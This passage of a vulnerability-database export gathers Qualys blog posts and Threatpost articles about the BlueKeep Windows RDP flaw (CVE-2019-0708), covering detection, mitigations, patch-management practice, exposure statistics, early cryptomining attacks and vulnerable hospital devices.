Patch](<https://blog.qualys.com/laws-of-vulnerabilities/2019/05/15/windows-rdp-remote-code-execution-vulnerability-bluekeep-how-to-detect-and-patch>)\n\n#### Qualys Threat Protection\n\nIn addition, Qualys just updated BlueKeep as an \"Active Attack RTI\" for Qualys customers in [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) for effectively identifying and tracking the BlueKeep vulnerability.\n\nYou can search for all vulnerable systems in Qualys Threat Protection by using the following QQL (Qualys Query Language) query:\n\nvulnerabilities.vulnerability.threatIntel.activeAttacks:true\n\n#### Mitigation\n\nAs explained in [the Qualys blog post](<https://blog.qualys.com/laws-of-vulnerabilities/2019/05/15/windows-rdp-remote-code-execution-vulnerability-bluekeep-how-to-detect-and-patch>), admins are advised to apply the patch as soon as possible.\n\n * Block RDP service (port 3389)\n * Enable NLA - QID 90788 (Microsoft Windows Network Level Authentication Disabled) can be used to find hosts that have NLA disabled.\n\n### Get Started Now\n\nTo start detecting and 
remediating this vulnerability now, get a [Qualys Suite trial.](<https://www.qualys.com/forms/trials/suite/?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=apache-struts-q1-2017&utm_content=trial&leadsource=344554007&_ga=2.207783122.1107359783.1572892611-1000351777.1525114587>)", "modified": "2019-11-04T21:50:34", "published": "2019-11-04T21:50:34", "id": "QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/11/04/bluekeep-attacks-observed-months-after-initial-release", "type": "qualysblog", "title": "BlueKeep Attacks Observed Months after Initial Release", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-27T13:23:28", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[Recent reports](<https://www.zdnet.com/article/almost-one-million-windows-systems-vulnerable-to-bluekeep-cve-2019-0708/>) this year revealed nearly 1 million computer systems are still vulnerable and exposed to BlueKeep in the wild. These systems are still easy targets for an unauthenticated attacker (or malware) to execute code leveraging this patchable vulnerability. Because so many systems are still vulnerable, Qualys has added its BlueKeep dashboard directly into the product, so you can more easily track and remediate this vulnerability.\n\n### Why is BlueKeep So Critical?\n\nThe [BlueKeep](<https://blog.qualys.com/laws-of-vulnerabilities/2019/05/15/windows-rdp-remote-code-execution-vulnerability-bluekeep-how-to-detect-and-patch>) vulnerability announced earlier in 2019 allows attackers to run arbitrary program code on victims' computers. The vulnerability is found in Remote Desktop Services \u2013 formerly known as Terminal Services \u2013 which affects some older versions of Windows. The Remote Desktop Protocol (RDP) itself is not vulnerable. 
This vulnerability is pre-authentication and requires no user interaction, which makes it capable of widespread attacks, because attackers can use automated tools, as this vulnerability is \"wormable.\" This means an attack could spread itself automatically across networks without any intervention by users, just as the [WannaCry](<https://blog.qualys.com/securitylabs/2017/05/12/how-to-rapidly-identify-assets-at-risk-to-wannacry-ransomware-and-eternalblue-exploit>) and [Conficker](<https://blog.qualys.com/laws-of-vulnerabilities/2009/01/22/conficker-worm-explained>) worms have spread in the past.\n\nMicrosoft assigned it the highest severity level of Critical in its [published guidance for customers](<https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708>), and in the US government's National Vulnerability Database, the entry for [CVE-2019-0708](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?name=CVE-2019-0708&vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) is scored as 9.8 out of 10. Microsoft issued a [blog post](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) strongly recommending that users install its patches, including on those famous out-of-support operating systems such as Windows XP and Windows Server 2003.\n\n### Workarounds?\n\nThe following [workarounds](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) may be helpful, but in all cases Microsoft strongly recommends that you install the updates for this vulnerability as soon as possible, even if you plan to leave these workarounds in place:\n\n 1. **Enable Network Level Authentication** (NLA) on systems running supported editions of Windows 7, Windows Server 2008, and Windows Server 2008 R2. You can enable Network Level Authentication to block unauthenticated attackers from exploiting this vulnerability. 
With NLA turned on, an attacker would first need to authenticate to Remote Desktop Services using a valid account on the target system before the attacker could exploit the vulnerability.\n 2. **Block TCP port 3389** at the enterprise perimeter firewall: TCP port 3389 is used to initiate a connection with the affected component. Blocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid Internet-based attacks. However, systems could still be vulnerable to attacks from within their enterprise perimeter.\n 3. Accounts that can be logged into via RDP **require complex passwords** (a long passphrase containing 20+ characters).\n 4. **Install two-factor authentication** (2FA) and at a minimum require it on all accounts that can be logged into via RDP.\n\n### Tracking Impact and Remediation\n\nThe [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets. The Qualys signature and visualization teams have teamed up and included an in-product [BlueKeep dashboard](<https://discussions.qualys.com/docs/DOC-6785-dashboard-toolbox-assetview-qid-91534-cve-2019-0708-bluekeep>) for easy tracking and remediation. This dashboard has been included in Qualys Cloud Platform release 2.42 and can be found within the Dashboard templates library. 
It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nThe [dashboard toolbox in Qualys Community](<https://discussions.qualys.com/community/vulnerability-management/tags#/?tags=dashboard_toolbox>) has additional dashboards created by your SMEs and Product Management team that you can import into your subscription.\n\n### Remediating with Qualys Patch Management\n\nCustomers using [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) with Cloud Agent can search for cve:`CVE-2019-0708` in the Patch Catalog, and click \"Missing\" in the side panel to locate and deploy patches to all affected Operating Systems, including Windows XP and Server 2003.\n\nFor emergency patching, you can create an on-demand job and target it at the \"Cloud Agent\" tag to cover all hosts. For continuous patching, a daily job can be created with a 24-hour \"patch window\" to ensure all hosts will continue to receive the required patches. This patch does require a reboot.\n\nTargeting specific operating systems is not necessary. The Qualys Cloud Agent already knows which patch is needed for each host.\n\nWe should always keep in mind that adversaries don't have to be extremely skilled in finding vulnerable systems. 
There are tons of scripts, tools and online search engines that can help narrow down and identify systems for reconnaissance and further the Cyber Kill Chain steps for exploitation.\n\n### Get Started Now\n\nTo start detecting and remediating this vulnerability now, sign up for a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).", "modified": "2019-12-20T16:00:59", "published": "2019-12-20T16:00:59", "id": "QUALYSBLOG:400D28FE44174674BB4561AA9416F532", "href": "https://blog.qualys.com/technology/2019/12/20/blue-is-a-color-we-love-but-cant-keep", "type": "qualysblog", "title": "Blue\u00a0is a\u00a0color we love but can\u2019t Keep!", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-04-10T12:13:11", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "Patch management is a thankless job. Data shows, despite best efforts, that 80 percent of enterprise applications have at least one unpatched vulnerability in them, according to research by [Veracode](<https://www.veracode.com/state-of-software-security-report>).\n\nIt is not for lack of trying that vulnerabilities persist. Last year 16,500 [vulnerabilities were reported](<https://www.cvedetails.com/browse-by-date.php>), making patching each one nearly an impossible task for any one company. Perhaps it shouldn\u2019t be a surprise that Windows patching times appear to be moving in the wrong direction. According to Edgescan, the average time to patch rose from 63 days in 2017 to 81 days in 2018.\n\nWhat these statistics reveal is a process suffering under the weight of a shifting IT ecosystem that has ballooned to include a flood of bug submissions from a new crop of bounty programs, scrutinizing the growing army of chip-enabled gear.\n\nThe good news is that there\u2019s hope. Patching experts say there are concrete steps companies can take to avoid patch fatigue. 
Identifying the problems is an important first step.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/03103016/Veracode_Vulns_Numbers.png>)\n\nImage courtesy Veracode\n\n## Building a Better Patch Process\n\n\u201cOne of the biggest patching challenges is first identifying everything that needs to be patched,\u201d said Chris Goettl, director of product management and security for Ivanti. \u201cThe challenge becomes keeping a handle on how big a company\u2019s universe of devices is \u2014 and knowing what has been patched and what still needs to be.\u201d\n\nAdd in vulnerabilities related to software dependencies, such as the third-party code underlying software, and patching becomes even more arduous. Code repositories, open-source projects and small vendors poorly communicate bugs in their often complex library dependencies, he said.\n\n[Stagefright](<https://threatpost.com/stagefright-2-0-vulnerabilities-affect-1-billion-android-devices/114863/>), [Devil\u2019s Ivy](<https://threatpost.com/bad-code-library-triggers-devils-ivy-vulnerability-in-millions-of-iot-devices/126913/>) and the [Zip Slip flaw](<https://threatpost.com/zip-slip-flaw-affects-thousands-of-open-source-projects/132577/>) are just a few examples of vulnerabilities affecting thousands of open-source projects. And last month, VLC developer VideoLAN alerted customers [of a \u201chigh-risk\u201d bug](<https://threatpost.com/high-risk-vlc-media-player-bugs/147503/>) tied to a third-party component called MKV demuxer \u2014 a component responsible for multiplexing digital and analog files. The bug could allow an adversary to craft a malicious .MKV video file that could be used in an attack to gain control of the victim\u2019s PC, according to VideoLAN.\n\n\u201cWe assume a given developer is going to provide patches for their code. Obviously, they are going to fix any vulnerabilities. But almost every product these days is based on other third-party components. 
There is Apache Struts, Microsoft .NET core and Java development kits. It\u2019s very important that the components are updated as well,\u201d said Todd Schell, senior product manager, security, for Ivanti.\n\nThese are vulnerabilities that are compiled into the code and aren\u2019t something found by regular IT staff, Schell said. Developers, not just IT and security operations staff, need to be aware \u2013 pushing companies to adopt a DevOps approach to security.\n\n## A Race to Zero\n\nGoettl also noted that there is a race by hackers and researchers alike to shrink the time between a zero-day bug discovery and the publishing of a proof-of-concept (PoC) exploit of the flaw.\n\nIn the case of the \u201cwormable\u201d vulnerability known as BlueKeep ([CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)), [Microsoft patched the bug on May 14](<https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/>), and by May 22 a [proof-of-concept (PoC) exploit](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) of the flaw was demonstrated. Other [PoCs followed](<https://threatpost.com/working-bluekeep-exploit-developed-by-dhs/145784/>) in the [subsequent months](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>). On Thursday, Palo Alto Networks published [three additional](<https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/>) ways to exploit systems that have not been patched for BlueKeep.\n\nPoCs offer security professionals vital clues on how to identify a threat and mitigate against it. 
But, if patching isn\u2019t part of the PoC discovery and fix, it could lead to catastrophic results \u2013 think [EternalBlue and WannaCry](<https://threatpost.com/tag/wannacry/page/3/>).\n\nAs of July, the number of systems that remain exposed to the internet and unpatched against BlueKeep is [close to 800,000](<https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/>), according to BitSight.\n\n## Making Sense of CVSS Scores\n\nTyler Reguly, manager of security research and development for Tripwire, points out that the sheer number of patches facing IT and security teams leads to patch fatigue. The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities and is meant to help with that; CVSS scores assign severity scores to vulnerabilities with the intent of giving security professionals the ability to prioritize responses.\n\nHowever, oftentimes the severity score is higher than the threat really warrants; and sometimes it\u2019s the other way around, Reguly said.\n\n\u201cWhat you end up with is a lot of people looking at these CVSS scores, confused, asking themselves \u2018what should I patch, when should I patch it?\u2019\u201d he said.\n\nMatthew Howell, senior director of product for Flashpoint, recommends that when it comes to patch prioritization, IT needs to evaluate the threat variables of a bug as they relate to one\u2019s specific network. In a recent [blog post, he recommends](<https://www.flashpoint-intel.com/blog/a-clean-view-of-vulnerabilities-helps-prioritize-patching/>) that security teams ask themselves:\n\n * _How likely is the vulnerability to be exploited in the wild?_\n * _If the vulnerability is exploited in the wild, how likely is it to impact your organization?_\n * _If the vulnerability is exploited at your organization, what impact is it likely to have? 
_\n\nThe CVSS score assigned to a vulnerability reflects severity, not risk, Howell wrote.\n\n## Automating the Patching Process\n\nReguly says one of the best antidotes to fend off patching fatigue is automating as much of the patching process as possible. \u201cYou really need to architect to automate. That includes patching software, but also the processes as well,\u201d he said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/25161620/Patch-Management.jpg>)\n\nThat includes configuring orchestration tools such as Puppet to help automate the patching process. \u201cIf possible, some patch software supports APIs [and] can be used to tie in through an API for patch management and configuration management,\u201d Reguly said.\n\nHe said automation also includes patch validation and making sure patches and security updates are implemented properly. Lastly, he recommends determining if a software vendor\u2019s service-level agreement might also be leveraged to help with the patching process.\n\n## Driving a Stake in the Heart of a Check-Box Security Mentality\n\nJimmy Graham, senior director of vulnerability management for Qualys, calls the process vulnerability management, not just patch management. He warns against focusing exclusively on patch management to the exclusion of the bigger security picture.\n\nHe promotes the idea of vulnerability management lifecycles that start with asset inventory, collecting vulnerability information locally, prioritizing vulnerabilities and then moving to patch management.\n\n\u201cPatch management is a cyclical process where you are patching systems based on the fact a patch was released by a vendor. Vulnerability management is there to make sure that patching was effective as well as the configuration management,\u201d Graham said.\n\n## Best Practices\n\nBest practices, according to Graham, include creating a patching cadence based on vendor releases. 
IT should also identify and prioritize patches based on the company\u2019s unique infrastructure, and then test and deploy the patches themselves. Follow-up is just as important, he said, such as documenting the process for each technology patched \u2014 from operating systems to databases.\n\nHe also recommends patching and updating \u201cgolden images\u201d (master software images used by IT for mass software deployment) at least quarterly. \u201cThat way all new systems are remediated before they go into production,\u201d he said.\n\nThe goal is to significantly reduce or eliminate one-off patching. \u201cIf you\u2019ve ever tried to figure out what version of Flash to deploy, then you aren\u2019t doing it right,\u201d Graham said.\n\n**[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/03103951/DevOps.jpg>)**\n\n## The DevSecOps Approach\n\nStill others advocate taking a DevSecOps approach to security \u2014 i.e., a blending of software development, IT operations and security practices into a streamlined system lifecycle.\n\n\u201cThere is a strong correlation between how many times an organization scans and how quickly they address their vulnerabilities,\u201d Veracode said in [its _State of Software Security_ report](<https://www.veracode.com/state-of-software-security-report>). 
\u201cDevOps, or agile-driven development teams, are scanning more often, and as a result, they are making incremental [security] improvements every time they test.\u201d\n\nVeracode asserts that once organizations hit 300 or more internal scans per year, companies are seeing the \u201cfix velocity going into overdrive.\u201d Therefore, DevSecOps in theory could be vital when it comes to spotting bugs early in the development process \u2013 making vulnerabilities easier, faster and less expensive to fix, [security experts say](<https://threatpost.com/how-to-solve-the-developer-vs-cybersecurity-team-battle/133759/>).\n\nThere\u2019s a caveat to this though: The idea presupposes an unlikely harmonious relationship between developers and security teams. Often development teams are under pressure to deliver feature-rich applications on near impossible deadlines. Security teams, on the other hand, are under growing pressure to safeguard data.\n\n## Patching Landscape Moves to Cloud\n\nThings are changing in the patching landscape as more compute moves to the cloud. Applications such as Salesforce and Office 365 represent a growing number of cloud-based solutions running on AWS, Google Compute and Microsoft Azure. As the move to cloud services grows, cloud providers share the responsibility for security with their customers, Schell said.\n\nThe Cloud Native Computing Foundation, the organization behind popular container project Kubernetes, has had to tackle a number of [vulnerabilities in its platform](<https://github.com/kubernetes/kubernetes>). One bug [found last month](<https://groups.google.com/forum/#!topic/kubernetes-security-announce/vUtEcSEY6SM>) could allow an adversary to access, modify or delete computing and storage resources configured across a cluster. 
Also last month there was an Azure update addressing a Kubernetes component that had a known vulnerability.\n\nThe shift from on-premises to off-premises (cloud) computing is a game changer for security teams, and it forces them to forfeit some control to platform providers, Schell said.\n\n\u201cIt\u2019s fully upon the shoulders of the [cloud] service provider to make sure the application is running with the most recent performance enhancements and security updates. And there is not much we can do as users,\u201d he said.\n\n_(A portion of this article is adapted from a previous Threatpost webinar, \u201c[Streamlining Patch Management](<https://threatpost.com/streamlining-patch-management-expert-advice/146686/>).\u201d In this 60-minute presentation, available on-demand, experts Todd Schell, senior product manager, security, for Ivanti; Tyler Reguly, manager of security R&D, for Tripwire; and Jimmy Graham, senior director, vulnerability management, for Qualys, are joined by Threatpost editor Tom Spring to discuss streamlining patch management and offer patching advice, tips and tricks.)_\n", "modified": "2019-09-03T18:17:11", "published": "2019-09-03T18:17:11", "id": "THREATPOST:472451689B2FA39FCB837D08B514FF91", "href": "https://threatpost.com/how-to-handle-patch-management/147909/", "type": "threatpost", "title": "How to Get a Handle on Patch Management", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-22T21:49:04", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "For the past two months, security researchers have been sounding the alarm about BlueKeep, a critical remote code-execution vulnerability in Microsoft Windows that researchers said could lead to a \u201cmega-worm\u201d global infection. 
As of July 2, approximately 805,665 systems remain online that are vulnerable to BlueKeep, according to a status update from BitSight.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/17155620/bluekeep.png>)\n\nSource: BitSight\n\nThe number of susceptible systems represents a decrease of 17.18 percent (167,164 systems) compared to May 31, including 92,082 systems which remain externally exposed but have been patched. This translates to an average decrease of 5,224 exposed vulnerable systems per day, between patching, taking them offline and replacing them.\n\nThe BlueKeep RCE vulnerability ([CVE-2019-0708](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>)) exists in Remote Desktop Services and impacts older versions of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a WannaCry-level, fast-moving infection wave.\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. 
It has also issued multiple follow-on advisories urging administrators to patch.\n\n## Patches Slowly Roll Out\n\nBitSight\u2019s analysis shows a mixed report card on how well organizations have closed that security hole, with a variable amount of progress made within each industry.\n\nBitSight found that the most responsive industries in mitigating BlueKeep have been legal, nonprofit/NGO and aerospace/defense with a 32.9 percent, 27.1 percent and 24.1 percent respective reduction in the number of organizations affected.\n\nConversely, the consumer goods, utilities and (ironically) technology industries have been the least responsive, with only 5.3 percent, 9.5 percent and 11.7 percent of organizations respectively having taken an.\n\nIn terms of geography, China and the United States still have the highest number of exposed systems.\n\nYet, China showed the highest absolute improvement by reducing the number of exposed vulnerable systems by 109,670, which represents a 23.9 percent decrease. The United States followed suit by showing 26,787 fewer vulnerable systems exposed as of July 2, representing a 20.3 percent decrease.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/17155817/bluekeep-2.png>)\n\n
Source: BitSight.\n\nOther countries showing a notable reduction in exposed systems were Colombia (21.3 percent decrease), Latvia (20.7 percent decrease) and Guatemala (a 45.4 percent decrease).\n\nOn the flip side, South Korea actually showed a 14.5 percent increase over the period, adding 3,430 vulnerable exposed systems, and Estonia added 146, a 32.2 percent increase.\n\nFausto Oliveira, principal security architect at Acceptto, told Threatpost that patching is easier said than done.\n\n\u201cSome companies have very rigid change-management intervals due to regulatory constraints, others have very rigid internal change-management procedures \u2013 and finally, because there are RDP servers (unfortunately) inside the organization that fall outside of the remit of corporate IT,\u201d he said via email. \u201cThe fact that these older machines are no longer supported by Microsoft could be a factor in the slow patching, especially in legacy systems that have poor documentation, and/or sometimes are outside of the supervision of corporate IT. There are some false misconceptions on the market, like if the OS is going end-of-life, let\u2019s not spend money on it until we replace it, which sometimes could be years away.\u201d\n\n## Very Real Exploit Danger\n\nIn June, [a working exploit](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) for the flaw showed how an unauthenticated attacker could achieve full run of a victim machine in about 22 seconds. 
Reverse engineer Z\u01dd\u0279osum0x0 released a video showing an RCE exploit working on a Windows 2008 desktop, paired with the Mimikatz tool to harvest login credentials.\n\nAn [earlier proof-of-concept](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) (PoC) from McAfee showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections.\n\n\u201cThe exploit is quite significant given the number of affected systems, which gives an attacker the ability not only of hijacking these machines, but to use them to further penetrate other systems and services inside the organization,\u201d Oliveira said. \u201cThe type of risks that organizations are facing are wide, just to name a few: once the exploit is in place the attacker can exfiltrate data from the RDP server, obtain credentials, disrupt the operations of the organization or use the RDP server as a jumping point to access further resources inside the company.\u201d\n
", "modified": "2019-07-17T20:55:43", "published": "2019-07-17T20:55:43", "id": "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "href": "https://threatpost.com/805k-windows-systems-open-bluekeep/146529/", "type": "threatpost", "title": "Wormable BlueKeep Bug Still Threatens Legions of Windows Systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:42:44", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "The wave of [BlueKeep attacks](<https://threatpost.com/805k-windows-systems-open-bluekeep/146529/>) that security experts predicted could take down systems globally has arrived, but the attacks are not taking the form, nor having the destructive impact, that experts initially feared.\n\nSecurity researchers have seen evidence of the first wave of attacks on the zero-day Windows Remote Desktop vulnerability revealed by Microsoft in May. At the time experts said BlueKeep posed a threat to millions of internet-connected systems, with the capability to spread an automated worm from computer to computer, including nearly 1 million endpoints connected to the Internet of Things (IoT).\n\nSo far, BlueKeep has not lived up to this promise, nor has the vulnerability surfaced in the form of a worm. 
Instead, initial attacks install a cryptocurrency miner on an infected system, using processing power to generate cryptocurrency, [according to reports](<https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining/>).\n\nMoreover, instead of a worm that moves automatically and spreads quickly, attackers leveraged the vulnerability\u2019s connective capability to scan the Internet for vulnerable machines to exploit, researchers said.\n\nBritish cybersecurity expert Kevin Beaumont [Tweeted](<https://twitter.com/GossiTheDog/status/1190654984553205761>) about the first wave of attacks Sunday after noticing that a series of Remote Desktop Protocol (RDP) honeypots\u2014or machines set up as malware bait to help researchers detect and analyze outbreaks\u2014started simultaneously crashing.\n\nBeaumont alerted Kryptos Logic security researcher Marcus Hutchins, who analyzed the \u201ccrash dump\u201d and verified BlueKeep activity. \u201cAfter some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner,\u201d Hutchins, who uses the handle MalwareTech, [Tweeted](<https://twitter.com/MalwareTechBlog/status/1190730471321112577>).\n\nHutchins is known as the researcher who finally found the way to kill the 2017 WannaCry ransomware outbreak, which infected more than 200,000 machines in 150 countries, caused billions of dollars in damages, and hamstrung global business. He later [pleaded guilty](<https://threatpost.com/wannacry-hero-pleads-guilty-to-kronos-malware-charges/143997/>) to charges related to the creation of the Kronos malware.\n\nResearchers first [revealed BlueKeep](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) and its potentially catastrophic power in May, after Microsoft patched it as part of its Patch Tuesday update that month. 
The vulnerability was identified as a critical remote code-execution flaw in Remote Desktop Services impacting older versions of Windows, including Windows 7, Windows XP, Server 2003 and Server 2008.\n\nMicrosoft issued a [stern warning](<https://msrc-blog.microsoft.com/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) to users to patch vulnerable systems at the time, noting BlueKeep\u2019s potential to wreak as much havoc as WannaCry.\n\nIndeed, a number of [proof-of-concept exploits](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) followed the discovery of the vulnerability, one showing a doomsday scenario in which an attacker took complete control of someone\u2019s machine in a mere 22 seconds.\n\nOther exploits followed, including [one developed](<https://threatpost.com/working-bluekeep-exploit-developed-by-dhs/145784/>) by the Department of Homeland Security that took advantage of the vulnerability on a Windows 2000 machine\u2014a version of the OS not included in Microsoft\u2019s original alert.\n\nFortunately, the first attacks exploiting BlueKeep show none of the vulnerability\u2019s destructive potential\u2013but this doesn\u2019t mean security administrators can rest easy just yet. 
This lackluster initial performance could reflect the attackers\u2019 lack of sophistication more than the nature of the vulnerability itself, observers noted.\n\n\u201cFeel sorry for the [#bluekeep](<https://twitter.com/hashtag/bluekeep?src=hashtag_click>) malware authors: Imagine if cryptomining was the best thing you could come up with,\u201d a computer emergency response team (CERT) employee at a public financial institution called James Attack [Tweeted](<https://twitter.com/JamesAtack/status/1191264112522792960>), along with a meme of celebrity musician Taylor Swift gesturing the letter \u201cL\u201d on her forehead for \u201closer.\u201d\n\nIndeed, as security researchers already have demonstrated BlueKeep\u2019s potential, it\u2019s only a matter of time before someone with bad intentions cracks the code and exploits the vulnerability to its full potential now that the attack floodgates are open.\n", "modified": "2019-11-04T11:24:08", "published": "2019-11-04T11:24:08", "id": "THREATPOST:9599D75F1FEDE69B587F551FF63C7C77", "href": "https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/", "type": "threatpost", "title": "BlueKeep Attacks Have Arrived, Are Initially Underwhelming", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:36:33", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "While Microsoft issued patches for the [infamous BlueKeep 
vulnerability](<https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/>) almost a year ago, researchers warn that almost half of connected medical devices in hospitals run on outdated Windows versions that are still vulnerable to the remote desktop protocol (RDP) flaw.\n\nResearchers said they found that 22 percent of a typical hospital\u2019s Windows devices were vulnerable to BlueKeep. Even worse, the number of connected medical devices running Windows that are vulnerable to BlueKeep is considerably higher \u2014 around 45 percent, they said. Vulnerable medical devices can include MRIs, ultrasounds, X-rays, and more, which run on operating systems \u2014 typically Windows \u2013 allowing their operators to more easily collect and upload data.\n\n\u201cFor hospitals, the task of monitoring vulnerabilities, identifying affected devices, chasing down suitable patches, and distributing those patches across a sprawling campus is tedious, to say the least,\u201d said researchers with CyberMDX in their [\u201c2020 Vision\u201d report on medical security](<https://www.cybermdx.com/hubfs/Downloadable%20Assets/2020%20Vision%20-%20A%20Review%20of%20Major%20IT%20&%20Cybersecurity%20Issues%20Affecting%20Healthcare_03.pdf?utm_source=hs_automation&utm_medium=email&utm_content=83601713&_hsenc=p2ANqtz-8LB8KZilre2-wOeS6fwp0EuTQ8bkZ8OabcwLXVVXks7psugIMYqyK69oRYFSdkRq2TGPzBLk3aWZ-UP3RdRdkidFD7zK5E4cEcDDhLW_2GPQxDsm0&_hsmi=83601713>), released Tuesday. \u201cThis process is slow and inefficient, as the hospitals usually do not know which devices or security issues to attend to first.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe BlueKeep flaw ([CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)) was fixed during Microsoft\u2019s [May 2019 Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin. 
System administrators were urged to immediately deploy fixes as the flaw could pave the way for a similar rapidly-propagating attack on the [scale of WannaCry](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>). In the months following the disclosure of BlueKeep, researchers tracked a [spike in scans for vulnerable systems](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) and eventually [active attacks exploiting the flaw](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>).\n\nAlmost a year later, researchers have found that an alarming number of connected medical devices remain vulnerable to BlueKeep. The wormable implications of BlueKeep on medical devices are particularly concerning due to the hit that many hospitals took after attackers launched the [2017 WannaCry attack](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>), interrupting several critical services at hospitals across England.\n\nBeyond BlueKeep, outdated Windows versions are also exposing medical devices to an array of other vulnerabilities. For instance, up to 11 percent of connected medical devices are exposed to [DejaBlue](<https://threatpost.com/cisco-patches-six-critical-bugs/147585/>), a set of RDP flaws affecting Windows 7, Windows 8.1, and Windows 10 (as well as Windows Server 2008, Windows Server 2012, Windows Server 2016, and Windows Server 2019).\n\n## Medical Security Issues\n\nSo why haven\u2019t organizations updated their medical devices? This is due to a variety of reasons. Patch management, for one, is a big issue for hospitals. 
Researchers said that four months after a major vulnerability is disclosed, most hospitals will still not have patched more than 40 percent of their vulnerable devices.\n\nAccording to [previous CyberMDX research](<https://www.cybermdx.com/hubfs/Downloadable%20Assets/Clinical%20Connectivity%20Just%20the%20Facts.pdf?utm_source=hs_automation&utm_medium=email&utm_content=83092762&_hsenc=p2ANqtz--TX7BUvCUeXCs9gsaE02MUWeIzq19fY9l_6QNlrBUzDk3z95KxoqOtUK5Wv_fKxpu1OnstOR9UD7p1K99vW_onsXCua1uUwHXCYGM9pnVN2LhVX3M&_hsmi=83092762>), 80 percent of device manufacturers and healthcare orgs report that medical devices are \u201cvery difficult to secure,\u201d citing a lack of knowledge and training on secure coding practices, and pressure on development teams to meet product deadlines. The study also pointed to a lack of quality assurance and testing procedures for medical devices, which lead to more vulnerabilities slipping by when products go to market. In fact, nearly one in three organizations surveyed by CyberMDX said that they never audit their medical devices for known vulnerabilities.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/19133850/medical-device-connected.png>)\n\nThat\u2019s no surprise to Charles Ragland, security engineer at Digital Shadows, who worked in emergency rooms and on ambulances as a paramedic for 10 years. During that time, he witnessed outdated medical devices first hand, including cardiac catheterization lab systems running on Windows Server 2003.\n\n\u201cWith the level of 